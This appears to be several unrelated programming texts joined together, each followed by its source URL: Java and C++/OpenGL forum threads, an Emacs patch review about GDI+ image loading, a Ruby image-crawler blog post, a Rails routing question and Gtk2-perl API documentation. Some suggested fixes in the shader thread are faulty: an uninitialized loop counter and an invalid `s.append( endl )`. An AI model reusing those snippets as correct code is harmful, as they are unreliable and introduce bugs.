                    case 2: System.out.print("Plums "); break;
                    case 3: System.out.print("Bells "); break;
                    case 4: System.out.print("Melons "); break;
                    case 5: System.out.print("Bars "); break;
                    default: // Shouldn't get here...
                        System.out.print("TILT! "); // Or "Error!" or something like that
                        break;
                }

                switch (rndSlot3)
                {
                    case 0: System.out.println("Cherries"); break;
                    case 1: System.out.println("Oranges"); break;
                    case 2: System.out.println("Plums"); break;
                    case 3: System.out.println("Bells"); break;
                    case 4: System.out.println("Melons"); break;
                    case 5: System.out.println("Bars"); break;
                    default: // Shouldn't get here...
                        System.out.print("TILT!"); // Or "Error!" or something like that
                        break;
                }

                //; }

                if (multiplier > 0) // See if they won anything this time
                {
                    totalWinning += (betAmnt * multiplier); // Accumulate Total Winnings
                    System.out.println("\nCongratulations, you've won : $" + (betAmnt * multiplier));
                }
                else
                {
                    System.out.println("\nSorry, please try again");
                }
            }
        } while (betAmnt > 0);

        System.out.println("\nThank you for playing.\n");
        System.out.println("Your total winnings: " + totalWinning);
        System.out.println("Your total bets: " + totalBet);
        System.out.println("You lost/gained: " + (totalWinning - totalBet) + " in " + cntPlays + " pulls.");
    }
}

Particularly these lines:

Code :
//; }

So, thoughts? What is a better way to find matches between variables (all ints) without overcounting? (My first code made that mistake, but I fixed it and resubmitted it to my teacher in time.)
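One array-free way to count matches is to compare the pairs directly: with three slots there are only three pairs, so there is nothing to overcount. For five slots the same pairwise idea still works but grows quickly, which is where an array (or a frequency map) becomes the cleaner tool. A hedged sketch (class and method names are mine, not from the thread):

```java
public class MatchCounter {
    // Size of the largest group of equal slot values among three slots:
    // 3 = three of a kind, 2 = one matching pair, 1 = no matches.
    static int bestMatch(int a, int b, int c) {
        if (a == b && b == c) return 3;
        if (a == b || b == c || a == c) return 2;
        return 1;
    }

    public static void main(String[] args) {
        System.out.println(bestMatch(2, 2, 2)); // 3
        System.out.println(bestMatch(1, 2, 1)); // 2
        System.out.println(bestMatch(0, 1, 2)); // 1
    }
}
```

The payout multiplier can then be derived from the returned count, keeping the counting logic in one place instead of a chain of nested ifs.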
http://www.javaprogrammingforums.com/%20whats-wrong-my-code/18580-simple-question-curiosity-not-really-important-printingthethread.html
> From: Juan José García-Ripoll > <address@hidden> > Date: Mon, 30 Mar 2020 09:54:26 +0200 > > > Please point to the relevant APIs, to make the discussion more > > practical. > > GDI+ is an evolution of GDI that supports arbitrary plug-ins for image > formats, > both bitmaps and vector type. It is a bit more modern than GDI, from what I > get, but, just as GDI, it is not the modern standard for Windows 2D > displays. Indeed, it is old enough that it is also supported by Windows XP. > > > > GDI+ has a flat C interface that allows loading images, querying properties, > displaying them and converting them to older GDI formats. > > Thanks. Interesting, I didn't know GDI+ had a C API. Did you verify using these APIs will allow us to keep using the code which processes images at display time? Will image scaling and rotation still work as it does now? What about masking? > - At configuration time, it works just as the NextStep (NS) system, disabling > the use of libpng, libjpeg, libtiff and libgif when the build system is > Mingw. AFAIU, we will also be able to support EXIF without ImageMagick. > - In images such as PNG, GIF or TIFF, it currently does not use a bitmask for > display. Instead, it relies on GDI+'s convertion to HBITMAP, which allows > alpha blending with any background color of choice. I don't know enough to understand what that means, but if this doesn't lose functionality, it's OK. > - In the C code, it replaces the load_jpeg, load_gif, etc, with a generic > w32_load_image() function in src/w32image.c. This function is heavily > inspired by ns_load_image() in src/nsimage.c. There's a complication we must consider in this regard, see below. > The only thing that is missing is a place to call GdipShutdown(). I do not > know > how to add an exit handler for Emacs' C core. I think you want to do it in w32.c:term_ntproc. 
> I have also verified that it is possible to convert all *.xpm icons to *.png > format and thus eliminate the need to include libXpm-noX.dll. Plus, the size > of > the icons is reduced by 50% We aren't going to get rid of XPM icons in the distribution any time soon (because of other platforms), so I don't see an urgent need to do this. > --- a/src/image.c > +++ b/src/image.c > @@ -18,6 +18,12 @@ Copyright (C) 1989, 1992-2020 Free Software Foundation, > Inc. > along with GNU Emacs. If not, see <>. */ > > #include <config.h> > +#ifdef HAVE_GDIPLUS > +#undef HAVE_JPEG > +#undef HAVE_PNG > +#undef HAVE_GIF > +#undef HAVE_TIFF > +#endif We cannot do this at compile time, because we still try supporting ancient Windows versions where GDI+ is not available. Moreover, I think it's good to let users have the ability to decide dynamically which image display capability they want. It certainly makes sense to do that initially, while the GDI+ way is being tested in all kinds of real-life use cases. So all the compile-time tests will have to be rewritten as run-time tests, and we should provide variables to force Emacs use/not use GDI+, perhaps at image format granularity, and expose those variables to Lisp, so users could control that. A few other minor comments about the code below: > +#elif defined HAVE_GDIPLUS > > -#endif /* HAVE_NS */ > +static bool > +png_load (struct frame *f, struct image *img) > +{ > + return w32_load_image (f, img, > + image_spec_value (img->spec, QCfile, NULL), > + image_spec_value (img->spec, QCdata, NULL)); > +} > + > +#define init_png_functions init_w32_image_load_functions And this stuff will have to learn to coexist with the current code which loads PNG etc. images using the respective libraries. > +static int > +gdiplus_initialized_p() Style: we use ANSI C99 declarations, so please say static int gdiplus_initialized_p (void) (Btw, it looks like this function should return a 'bool', not 'int'. 
Also, please leave a space between the end of the function/macro name and the opening parentheses. > + static int gdip_initialized = 0; No need to initialize a static variable to a zero value. > + if (gdip_initialized < 0) > + { > + return 0; > + } > + else if (gdip_initialized) > + { > + return 1; > + } Style: we don't use braces when a block has only one line. > + status = GdiplusStartup(&token, &input, &output); ^^ Style: space missing there. > +static float > +w32_frame_delay(GpBitmap *pBitmap, int frame) A nit: why 'float' and not 'double'? 'float' causes a minor inefficiency, so unless there's a good reason, I'd prefer 'double'. > + // Assume that the image has a property item of type > PropertyItemEquipMake. > + // Get the size of that property item. Please use C-style comments /* like this */, not C++-style comments. > + fprintf(stderr, "FrameCount: %d\n", (int)frameCount); > + fprintf(stderr, " index: %d\n", frame); Are these left-overs from the debugging stage? > +static ARGB > +w32_image_bg_color(struct frame *f, struct image *img) > +{ > + /* png_color_16 *image_bg; */ ^^^^^^^^^^^^^^^^^^^^^^^ And this? > + if (STRINGP (specified_bg) > + ? FRAME_TERMINAL (f)->defined_color_hook (f, > + SSDATA (specified_bg), > + &color, > + false, > + false) > + : (FRAME_TERMINAL (f)->query_frame_background_color (f, &color), > + true)) Do we really need to go through the hook mechanism here? The frame type is known in advance, right? > + if (STRINGP (spec_file)) > + { > + filename_to_utf16 (SSDATA (spec_file) , filename); > + status = GdipCreateBitmapFromFile (filename, &pBitmap); What to do here if w32-unicode-filenames is nil? > + else if (STRINGP (spec_data)) > + { > + IStream *pStream = SHCreateMemStream ((BYTE *) SSDATA (spec_data), > + SBYTES (spec_data)); Are we sure spec_data is a unibyte string here? Do we need an assertion or maybe a test and a conversion? 
> + /* In multiframe pictures, select the first one */ Style: comments should end with a period and 2 spaces before */.
https://lists.gnu.org/r/emacs-devel/2020-03/msg00865.html
I found some source code that has this in it

Posted 25 December 2012 - 07:53 PM

Posted 25 December 2012 - 08:10 PM

for(i; i < sLines.size(); i++)

L. Spiro
My Art:
My Music:
L. Spiro Engine:
L. Spiro Engine Forums:

Posted 25 December 2012 - 08:34 PM

ok thanks sorry for asking stupid question

Posted 26 December 2012 - 08:36 AM

Also, you can put the int inside the for() statement:

for(int i; i < sLines.size(); i++)

The difference is whether 'i' goes in the scope outside the for() loop or not. Usually you don't want that, but occasionally you do.

The code seems to be converting an std::vector of std::strings to a dynamically allocated raw array of raw strings. That's like going from driving a good car with airbags and your seatbelt on (perfectly safe), to ducktaping yourself to the belly of an elephant (dangerous, messy, and in most situations just plain dumb). Are you sure the code you are converting actually needs to convert the std::vector<std::string> to char*[]?
If they took shortcuts there, the remainder of their code might be smelly, too. What is it you are trying to accomplish in the larger scheme? Maybe we can help you figure out a less smelly method. Posted 26 December 2012 - 02:12 PM Edited by proanim, 26 December 2012 - 02:12 PM. Posted 26 December 2012 - 02:44 PM You're mixing things up here. First of all, fgets() is a C function (included via the header cstdio). You are reading from a file into a C-style array, then creating a C++ string from the line you read. This is pointless. C++ includes functionality for reading lines from files as well, without the limitation of reading to a fixed-length buffer: #include <fstream> #include <string> std::vector<std::string> sLines; std::ifstream infile("testfile.txt"); while(!infile.eof()) { std::string s; std::getline(infile, s); sLines.push_back(s); } infile.close(); getline() will read a string until a newline is encountered, without the maximum size limit of 255 that the fixed-length C-style read has. The allocation is invisibly handled by the string class. And no, you don't need to free sLines explicitly; it will be freed when it goes out of scope. The only things you need to free are things you explicitly new. That's the beauty of using C++ standard library functionality, rather than C or (as you are doing here) a bastard mix of C and C++. Now, I take it from the second part of your code that you need sProgram to be an array of pointers to C-style strings (for whatever reason). 
Rather than explicitly using new/delete you could do something like this (note that this is still somewhat C-ish, and there are other and more concise ways of doing it in straight C++; but now is not the time to introduce lambdas, I think ;) ): std::vector<const char *> sProgram; for(unsigned int i=0; i<sLines.size(); ++i) { sProgram.push_back(sLines[i].c_str()); } If you have C++11 you can then call sProgram.data() to get a pointer to the array of const char * held by sProgram, and use that wherever you are using your current sProgram pointer. If you don't have C++11, then the line &sProgram[0] works, though it is, of course, a bit hacky, (and the pointer is invalidated if you do another push_back that causes a reallocation, so be careful). This way, sProgram is also automatically managed (it grows as needed when more lines are added, and is automatically deleted when it goes out of scope) without the explicit new/delete calls. Even better would be to re-work whatever it is you need sProgram for so it doesn't require an array of C-style strings, but this might not always be possible if you are sending it to a third party library or API (such as a shader compiler, which I suspect you are doing). In this day and age, if you are using a C++ compiler and you are doing explicit allocating/de-allocating of arrays and strings, then you really ought to take a good hard look at what you are doing and why, as there are almost always safer ways to do it that don't require possibly unsafe memory management. Posted 26 December 2012 - 04:47 PM Ok i made changes and now same stuff happens only difference is now i can't complete the entire process. 
There is no error or anything the funtion returns false bool CShader::loadShader(string sFile, int a_iType) { //FILE* fp = fopen(sFile.c_str(), "rt"); //if(!fp)return false; // get all lines from a file vector<string> sLines; //char sLine[255]; //while(fgets(sLine, 255, fp))sLines.push_back(sLine); //fclose(fp); ifstream infile(sFile.c_str()); while(!infile.eof()) { string s; getline(infile, s); sLines.push_back(s); } infile.close(); //const char** sProgram = new const char*[ESZ(sLines)]; //FOR(i, ESZ(sLines))sProgram[i] = sLines[i].c_str(); //const char** sProgram = new const char* [(int)sLines.size()]; vector<const char *> sProgram; //for(int i; i < sLines.size(); i++) // sProgram[i] = sLines[i].c_str(); for(unsigned int i=0; i<sLines.size(); ++i) sProgram.push_back(sLines[i].c_str()); uiShader = glCreateShader(a_iType); glShaderSource(uiShader, sLines.size(), &sProgram[0], NULL); glCompileShader(uiShader); //delete[] sProgram; int iCompilationStatus; glGetShaderiv(uiShader, GL_COMPILE_STATUS, &iCompilationStatus); if(iCompilationStatus == GL_FALSE)return false; iType = a_iType; bLoaded = true; return 1; } What can cause glGetShaderiv(uiShader, GL_COMPILE_STATUS, &iCompilationStatus); to fail ? Shader files that i use with this are basic color shaders and they work with orginal function but now they fail to compile, I am not sure why exactly. Posted 26 December 2012 - 04:54 PM Per the manual page on glCompileShader you can call glGetShaderInfoLog to get some information on why the compile might have failed. Posted 26 December 2012 - 05:35 PM Well all I can get from glGetShaderInfoLog is '00B4A520' or similar ??? Posted 26 December 2012 - 05:41 PM Why don’t you show the code you are using to get said results? Also, your way of loading the shader is dreadful (why not just load the file into memory, add a 0 at the end, and pass that directly to ::glShaderSource() instead of wasting time creating an array of char *’s?), but I don’t see any bugs in it. 
So why not save a reply and also post the shader code since that seems more likely to be the source of the error? L. Spiro Edited by L. Spiro, 26 December 2012 - 05:45 PM. My Art: My Music: L. Spiro Engine: L. Spiro Engine Forums: Posted 26 December 2012 - 06:10 PM Why do you guys load shader sources line by line? Thats a extra runtime. Shader sources aren't very big, everything can be done with one read: GLuint ShaderLoader::shaderFromFile(const std::string& name, GLenum type) { std::fstream file(name.c_str(), std::ios::binary | std::ios::in); if (!file.good()) { Logger::getInstance().log(Logger::LOG_ERROR, "Cannot open file %s", name.c_str()); return 0; } file.seekg(0, std::ios::end); int sourceLength = file.tellg(); GLchar* shaderSource = new GLchar[sourceLength + 1]; file.seekg(0, std::ios::beg); file.read(shaderSource, sourceLength); shaderSource[sourceLength] = 0; GLuint shader = glCreateShader(type); glShaderSource(shader, 1, (const GLchar**)&shaderSource, NULL); glCompileShader(shader); delete[] shaderSource; GLint compileStatus; glGetShaderiv(shader, GL_COMPILE_STATUS, &compileStatus); if (compileStatus == GL_FALSE) { GLint infoLogLength; glGetShaderiv(shader, GL_INFO_LOG_LENGTH, &infoLogLength); GLchar* infoLog = new GLchar[infoLogLength + 1]; glGetShaderInfoLog(shader, infoLogLength, NULL, infoLog); Logger::getInstance().log(Logger::LOG_ERROR, "In file %s: %s", name.c_str(), infoLog); delete[] infoLog; } return shader; } Edited by santa01, 26 December 2012 - 06:12 PM. Posted 26 December 2012 - 07:23 PM So why not save a reply and also post the shader code since that seems more likely to be the source of the error? 
Shaders are working in first version of the function vertex shader: #version 330 layout (location = 0) in vec3 inPosition; layout (location = 1) in vec3 inColor; smooth out vec3 theColor; void main() { gl_Position = vec4(inPosition, 1.0); theColor = inColor; } fragment shader #version 330 smooth in vec3 theColor; out vec4 outputColor; void main() { outputColor = vec4(theColor, 1.0); } these are loaded with // Load shaders and create shader program shVertex.loadShader("data/shaders/color.vert", GL_VERTEX_SHADER); shFragment.loadShader("data/shaders/color.frag", GL_FRAGMENT_SHADER); Posted 26 December 2012 - 08:10 PM Well all I can get from glGetShaderInfoLog is '00B4A520' or similar ??? Why don’t you show the code you are using to get said results? My Art: My Music: L. Spiro Engine: L. Spiro Engine Forums: Posted 26 December 2012 - 09:49 PM What L. Spiro is saying, in case it's not obvious, is that you're not showing how you're getting this error log back... Your earlier post shows some good info on how you're compiling your shader, but it doesn't show how you're obtaining that strange error log. It's kinda like trying to diagnose a patient, if you're a doctor, and he says "I have symptoms" but doesn't say what those symptoms are Edited by Cornstalks, 26 December 2012 - 10:00 PM. Posted 27 December 2012 - 09:17 AM glShaderSource(uiShader, sLines.size(), &sProgram[0], NULL); glCompileShader(uiShader); int infologLength; int maxLength; char* infoLog; glGetShaderiv(uiShader,GL_INFO_LOG_LENGTH, &maxLength); glGetShaderInfoLog(uiShader, maxLength, &infologLength, infoLog); ofstream outfile; outfile.open ("log.txt"); outfile << &infoLog << endl; outfile.close(); Posted 27 December 2012 - 09:27 AM Santa01 showed above how to get the log from the shader or program object. 
Your code has two major problems though: Posted 27 December 2012 - 09:44 AM finally, so the errors are this Fragment shader failed to compile with the following errors: ERROR: 2:1: error(#307) Profile "smooth" is not supported ERROR: 2:1: error(#76) Syntax error: unexpected tokens following #version ERROR: error(#273) 2 compilation errors. No code generated any ideas? Posted 27 December 2012 - 10:23 AM getline(infile, s);should be: getline(infile, s); s.append( endl );I had assumed originally that ::glShaderSource() would treat each line you passed to it as…a line. Edited by L. Spiro, 27 December 2012 - 10:36 AM. My Art: My Music: L. Spiro Engine: L. Spiro Engine Forums:
http://www.gamedev.net/topic/636345-how-to-avoid-macro-loops/
I don't write much code these days and felt it was time to sharpen the saw. I have a need to download a ton of images from a site (I got permission first...) but it is going to take forever to do by hand. Even though there are tons of tools out there for image crawling I figured this would be a great exercise to brush up on some skills and delve further into a language I am still fairly new to, Ruby. This allows me to use basic language constructs, network IO, and file IO, all while getting all the images I need in a fast manner. As I have mentioned a few times on this blog, I am still new to Ruby so any advice for how to make this code cleaner is appreciated. Here is the source:

```ruby
require 'net/http'
require 'uri'

class Crawler
  # This is the domain or domain and path we are going
  # to crawl. This will be the starting point for our
  # efforts but will also be used in conjunction with
  # the allow_leave_site flag to determine whether the
  # page can be crawled or not.
  attr_accessor :domain

  # This flag determines whether the crawler will be
  # allowed to leave the root domain or not.
  attr_accessor :allow_leave_site

  # This is the path where all images will be saved.
  attr_accessor :save_path

  # This is a list of extensions to skip over while
  # crawling through links on the site.
  attr_accessor :omit_extensions

  # This keeps track of all the pages we have visited
  # so we don't visit them more than once.
  attr_accessor :visited_pages

  # This keeps track of all the images we have downloaded
  # so we don't download them more than once.
  attr_accessor :downloaded_images

  def begin_crawl
    if domain.nil? || domain.length < 4 || domain[0, 4] != "http"
      @domain = "http://#{domain}"
    end
    crawl(domain)
  end

  private

  def initialize
    @domain = ""
    @allow_leave_site = false
    @save_path = ""
    @omit_extensions = []
    @visited_pages = []
    @downloaded_images = []
  end

  def crawl(url = nil)
    # If the URL is empty or nil we can move on.
    return if url.nil? || url.empty?

    # If the allow_leave_site flag is set to false we
    # want to make sure that the URL we are about to
    # crawl is within the domain.
    return if !allow_leave_site &&
              (url.length < domain.length || url[0, domain.length] != domain)

    # Check to see if we have crawled this page already.
    # If so, move on.
    return if visited_pages.include? url

    puts "Fetching page: #{url}"

    # Go get the page and note it so we don't visit it again.
    res = fetch_page(url)
    visited_pages << url

    # If the response is nil then we cannot continue. Move on.
    return if res.nil?

    # Some links will be relative so we need to grab the
    # document root.
    root = parse_page_root(url)

    # Parse the image and anchor tags out of the result.
    images, links = parse_page(res.body)

    # Process the images and links accordingly.
    handle_images(root, images)
    handle_links(root, links)
  end

  def parse_page_root(url)
    end_slash = url.rindex("/")
    if end_slash > 8
      url[0, url.rindex("/")] + "/"
    else
      url + "/"
    end
  end

  def handle_images(root, images)
    if !images.nil?
      images.each { |i|
        # Make sure all single quotes are replaced with double quotes.
        # Since we aren't rendering javascript we don't really care
        # if this breaks something.
        i.gsub!("'", "\"")

        # Grab everything between src=" and ".
        src = i.scan(/src=[\"\']([^\"\']+)/)[0][0]

        # If the src is empty move on.
        next if src.nil? || src.empty?

        # If we don't have an absolute path already, let's make one.
        if !root.nil? && src[0, 4] != "http"
          src = root + src
        end

        save_image(src)
      }
    end
  end

  def save_image(url)
    # Check to see if we have saved this image already.
    # If so, move on.
    return if downloaded_images.include? url

    puts "Saving image: #{url}"

    # Save this file name down so that we don't download
    # it again in the future.
    downloaded_images << url

    # Parse the image name out of the url. We'll use that
    # name to save it down.
    file_name = parse_file_name(url)
    while File.exist?(save_path + "\\" + file_name)
      file_name = "_" + file_name
    end

    # Get the response and data from the web for this image.
    response = Net::HTTP.get_response(URI.parse(url))
    File.open(save_path + "\\" + file_name, "wb+") do |f|
      f << response.body
    end
  end

  def parse_file_name(url)
    # Find the position of the last slash. Everything after
    # it is our file name.
    spos = url.rindex("/")
    url[spos + 1, url.length - 1]
  end

  def handle_links(root, links)
    if !links.nil?
      links.each { |l|
        # Make sure all single quotes are replaced with double quotes.
        # Since we aren't rendering javascript we don't really care
        # if this breaks something.
        l.gsub!("'", "\"")

        # Grab everything between href=" and ".
        href = l.scan(/(\href+)="([^"\\]*(\\.[^"\\]*)*)"/)[0][1]

        # We don't want to follow mailto or empty links
        next if href.nil? || href.empty? ||
                (href.length > 6 && href[0, 6] == "mailto")

        # If we don't have an absolute path already, let's make one.
        if !root.nil? && href[0, 4] != "http"
          href = root + href
        end

        # Down the rabbit hole we go...
        crawl(href)
      }
    end
  end

  def parse_page(html)
    # Start with all lowercase to ensure we don't have any
    # case sensitivity issues.
    html.downcase!

    images = html.scan(/<img[^>]*>/)
    links = html.scan(/<a[^>]*>/)

    return [images, links]
  end

  def fetch_page(url, limit = 10)
    # Make sure we are supposed to fetch this type of resource.
    return if should_omit_extension(url)

    # You should choose a better exception.
    raise ArgumentError, 'HTTP redirect too deep' if limit == 0

    response = Net::HTTP.get_response(URI.parse(url))
    case response
    when Net::HTTPSuccess then response
    when Net::HTTPNotFound then nil
    when Net::HTTPRedirection then fetch_page(response['location'], limit - 1)
    else
      response.error!
    end
  end

  def should_omit_extension(url)
    # Get the index of the last slash.
    spos = url.rindex("/")

    # Get the index of the last dot.
    dpos = url.rindex(".")

    # If the last dot is before the last slash, we don't have
    # an extension and can return.
    return false if spos > dpos

    # Grab the extension.
    ext = url[dpos + 1, url.length - 1]

    # The return value is whether or not the extension we
    # have for this URL is in the omit list or not.
    omit_extensions.include? ext
  end
end

crawler = Crawler.new
crawler.save_path = "C:\\Users\\jmcdonald\\Desktop\\CrawlerOutput"
crawler.omit_extensions = [ "doc", "pdf", "xls", "rtf", "docx", "xlsx",
                            "ppt", "pptx", "avi", "wmv", "wma", "mp3",
                            "mp4", "pps", "swf" ]
crawler.domain = ""
crawler.allow_leave_site = false
crawler.begin_crawl
```
Greetings,

I'm running into an odd problem here. Everything was working fine until I started playing with my application this morning. It seems that when I try to use my login action, I'm instead given this error:

Only get, put, and delete requests are allowed

This happens only after I submit the form. The login page is displayed fine when it's displayed using the GET method. Here is my controller code:

```ruby
def login
  session[:member_id] = nil
  if request.post?
    member = Member.authenticate(params[:username], params[:password])
    if member
      session[:member_id] = member.id
      flash[:notice] = "You have successfully logged in!"
      redirect_to stories_path
    else
      flash.now[:notice] = "Invalid username/password combination"
    end
  end
end
```

None of the code runs from within the `if request.post?` block. I removed the code and simply added a redirect_to to see what would happen, and the error still persists. At the bottom of the error page, it says:

```
{"cookie"=>[], "Cache-Control"=>"no-cache", "Allow"=>"GET, PUT, DELETE"}
```

Is there a way to edit this to allow POST as well? I've read on the Internet that moving your route high in the file will help; it didn't. My route looks like:

```ruby
map.resources :members, :collection => { :login => :get, :logout => :get }
```

From day one, I've had this error message pop up often. It seemed to do so after editing my routes. A simple reboot of my server resolved the problem on these occasions - it's not helping here. Any help would be appreciated. I've already played with this for a few hours with no luck. Thanks for your time!

~Dustin T.
I already posted a topic on this but have considerably changed my code (and that topic was put on hold... so I can't edit; I tried what one of the users said in different variations, but no beans). I've tried running just toMorse, but although it compiles I get no output and an error message of `java.lang.ArrayIndexOutOfBoundsException` (at ProjMorse.java:22 and 46).

```java
import java.util.Scanner;

public class ProjMorse {
    public static void main(String[] args) {
        Scanner input = new Scanner(System.in);
        String[] alpha = { "a", "b", "c", "d", "e", "f", "g", "h", "i",
                "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t",
                "u", "v", "w", "x", "y", "z", "1", "2", "3", "4", "5",
                "6", "7", "8", "9", "0", " " };
        String[] dottie = { ".-", "-...", "-.-.", "-..", ".", "..-.",
                "--.", "....", "..", ".---", "-.-", ".-..", "--", "-.",
                "---", ".--.", "--.-", ".-.", "...", "-", "..-", "...-",
                ".--", "-..-", "-.--", "--..", ".----", "..---", "...--",
                "....-", ".....", "-....", "--...", "---..", "----.",
                "-----", "|" };

        System.out.println("Enter English to convert from English or Morse to convert from Morse:");
        String ans = input.nextLine();
        if (ans.equals("English")) {
            System.out.println("Please enter the text you would like to convert to Morse Code: ");
            String english = input.nextLine();
            char[] translates = (english.toLowerCase()).toCharArray();
            System.out.println(toMorse(translates, dottie)); // calls on method toMorse
        } else if (ans.equals("Morse")) {
            System.out.println("Please enter the text you would like to convert to English (separate words with '|'):");
            String code = input.nextLine();
            String[] translates = (code.split("[|]", 0));
            System.out.println(toEnglish(translates, alpha)); // calls on method toEnglish
        } else
            System.out.println("Invalid input, please try again.");
    }

    public static String toMorse(char[] translates, String[] dottie) {
        String morse = "";
        for (int j = 0; j < translates.length; j++) {
            char a = translates[j];
            if (Character.isLetter(a)) {
                morse = dottie[a + 'a'];
            }
        }
        return morse; /* so I tried running only this (commented other stuff
                         out) and it compiled, but although it ran it didn't
                         translate */
    }

    public static String toEnglish(String[] translates, String[] alpha) {
        String s;
        for (int n = 0; n < translates.length; n++) {
            String a = translates[n];
            s = java.util.Arrays.asList(alpha).(Character.toChars(a + 'a')[0]); // I'm not sure what to do here..
        }
        return s;
    }
}
```

There are several things that do not work:

- `public class ...` (I suspect a copy-paste error)
- `import java.util.Scanner;` since you use Scanner
- toMorse: first, two args are expected (check the method signature); then, the first argument's name is not `morse` (unknown symbol), it must be `translates`, which you have just "created"! About the second: you need the array of strings that has in place of e.g. "e" the Morse code, so the second argument must be... `dottie`
- toEnglish: two args required (check the method signature, as done before!); the first has to be `translates`, again (unknown `s`, as `morse` before)! About the second argument: see above, but of course since you have Morse in input, you need the other array.
- In toMorse you pick each char using `translates[j]`, not `valueOf`.
- In toEnglish you get the string using `translates[n]`.
- In toEnglish and toMorse, you have to "accumulate" the converted string into a string, and return it at the end, i.e. outside the loops!
- `.charAt(0)`: to perform an op like `x - 'a'`, x can't be a string, so since you have a string, you must get its first char.
- `morse` and `s`: variable names in a method have nothing to do with variable names in the caller!

Example for toMorse:

```java
String morse = "";
for (int j = 0; j < translates.length; j++) {
    char a = translates[j];
    if (Character.isLetter(a)) {
        morse += dottie[a - 'a'];
    }
}
return morse; // this symbol is unknown to the caller
```

You will call it with something as simple as:

```java
System.out.println(toMorse(translates, dottie));
```

The fix for toEnglish is very similar (though your original code won't work), I hope you can do it by yourself.

I think that is all, more or less. For each string you have in your `translates` array, you have to search the `dottie` string array for that particular sequence of dots and lines. If you find it, the position (index) you find it at is also the index of the right letter kept in the `alpha` array. So you might need to add that array as an argument and use the index to pick the letter. Or, rather, you can use the same "trick" you used in toMorse and keep the toEnglish method signature unchanged: once you have the index, since you have found it, you can "invert" the coding algorithm, so you have to add `'a'` to that index (integer) to obtain the code for the letter. You can use something like `Character.toChars(k + 'a')[0]` to take the char you want to add to the "accumulation string", `k` being the index. The cumbersome notation `Character.toChars(k + 'a')[0]` is needed because `Character.toChars` returns an array, so we pick the first element of that array, which is the char we need.
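The index-arithmetic trick described in this answer (letter → table entry at `c - 'a'`, and Morse token → position in the table → letter) can be sketched in Python; the tables below are the letter portion of the same ones used in the Java code, and joining letters with spaces is an addition of this sketch, not something the Java version does:

```python
ALPHA = "abcdefghijklmnopqrstuvwxyz"
DOTTIE = [".-", "-...", "-.-.", "-..", ".", "..-.", "--.", "....", "..",
          ".---", "-.-", ".-..", "--", "-.", "---", ".--.", "--.-", ".-.",
          "...", "-", "..-", "...-", ".--", "-..-", "-.--", "--.."]

def to_morse(text):
    # accumulate into one string (outside the loop!), one token per letter
    return " ".join(DOTTIE[ord(c) - ord("a")] for c in text.lower()
                    if c.isalpha())

def to_english(code):
    # the index where a token is found in DOTTIE is also the letter's
    # index in ALPHA -- the "invert the coding algorithm" idea
    return "".join(ALPHA[DOTTIE.index(tok)] for tok in code.split())

print(to_morse("sos"))          # ... --- ...
print(to_english("... --- ..."))  # sos
```

Since every Morse token for a letter is unique, encoding followed by decoding round-trips any alphabetic word.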
Gtk2::api - Mapping the Gtk+ C API to perl

The Gtk2 module attempts to stick as close as is reasonable to the C API, to minimize the need to maintain documentation which is nearly a copy of the C API reference documentation. However, the world is not perfect, and the mappings between C and perl are not as clean and predictable as you might wish. Thus, this page describes the basics of how to map the C API to the perl API, and lists various points in the API which follow neither the C API documentation nor the mapping principles. The canonical documentation is the upstream C API reference.

There are two main sections: 'BINDING BASICS' describes the principles on which the bindings work; understanding these can lead you to guess the proper syntax to use for any given function described in the C API reference. The second section lists various points in the API which follow neither the C API documentation nor the mapping principles; this section is in three main parts: missing methods, renamed methods, and different call signatures.

We avoid deprecated APIs. Many functions refer to C concepts which are alien to the bindings. Many things have replacements. Things that were marked as deprecated at gtk+ 2.0.0 do not appear in the bindings. This means that gtk+-1.x's GtkCList, GtkTree, and GtkText are not available. The notable exception is GtkList, which is available solely in support of GtkCombo (which was itself replaced by GtkComboBox in 2.4); it should not be used under any other circumstances. If you really need access to these old widgets, search the web for Gtk2::Deprecated. Some other things were deprecated during the gtk+ 2.x series, e.g. GtkOptionMenu was deprecated in favor of GtkComboBox in 2.4. Things that were marked as deprecated during the 2.x series will not be removed, basically because older versions do not have the replacements, and removing them would break backward compatibility.
The namespaces of the C libraries are mapped to perl packages according to scope, although in some cases the distinction may seem rather arbitrary:

```
g_          => Glib  (the Glib module - distributed separately)
gtk_        => Gtk2
gdk_        => Gtk2::Gdk
gdk_pixbuf_ => Gtk2::Gdk::Pixbuf
pango_      => Gtk2::Pango
```

Objects get their own namespaces, in a way, as the concept of the GType is completely replaced in the perl bindings by the perl package name. This goes for GBoxed, GObject, and even things like Glib::String and Glib::Int (which are needed for specifying column types in the Gtk2::TreeModel). (Flags and enums are special -- see below.)

```
GtkButton            => Gtk2::Button
GdkPixbuf            => Gtk2::Gdk::Pixbuf
GtkScrolledWindow    => Gtk2::ScrolledWindow
PangoFontDescription => Gtk2::Pango::FontDescription
```

With this package mapping and perl's built-in method lookup, the bindings can do object casting for you. This gives us a rather comfortably object-oriented syntax, using normal perl syntax semantics:

in C:

```c
GtkWidget * b;
b = gtk_check_button_new_with_mnemonic ("_Something");
gtk_toggle_button_set_active (GTK_TOGGLE_BUTTON (b), TRUE);
gtk_widget_show (b);
```

in perl:

```perl
my $b = Gtk2::CheckButton->new ('_Something');
$b->set_active (1);
$b->show;
```

You see from this that constructors for most widgets which allow mnemonics will use mnemonics by default in their "new" methods. For those who don't guess this right off, Gtk2::Button->new_with_mnemonic is also available. Cast macros are not necessary, and your code is a lot shorter.

Constants are handled as strings, because it's much more readable than numbers, and because it's automagical thanks to the GType system. Constants are referred to by their nicknames; basically, strip the common prefix, lower-case it, and optionally convert '_' to '-':

```
GTK_WINDOW_TOPLEVEL   => 'toplevel'
GTK_BUTTONS_OK_CANCEL => 'ok-cancel' (or 'ok_cancel')
```

Flags are a special case. You can't (sensibly) bitwise-or these string-constants, so you provide a reference to an array of them instead.
Anonymous arrays are useful here, and an empty anonymous array is a simple way to say 'no flags'.

```
FOO_BAR_BAZ | FOO_BAR_QUU | FOO_BAR_QUUX => [qw/baz quu qux/]
0                                         => []
```

In some cases you need to see if a bit is set in a bitfield; methods returning flags therefore return an overloaded object. See Glib for more details on which operations are allowed on these flag objects, but here is a quick example:

in C:

```c
/* event->state is a bitfield */
if (event->state & GDK_CONTROL_MASK)
    g_printerr ("control was down\n");
```

in perl:

```perl
# $event->state is a special object
warn "control was down\n" if $event->state & "control-mask";
```

But this also works:

```perl
warn "control was down\n" if $event->state * "control-mask";
warn "control was down\n" if $event->state >= "control-mask";
warn "control and shift were down\n"
    if $event->state >= ["control-mask", "shift-mask"];
```

And treating it as an array of strings (as in older versions) is still supported:

```perl
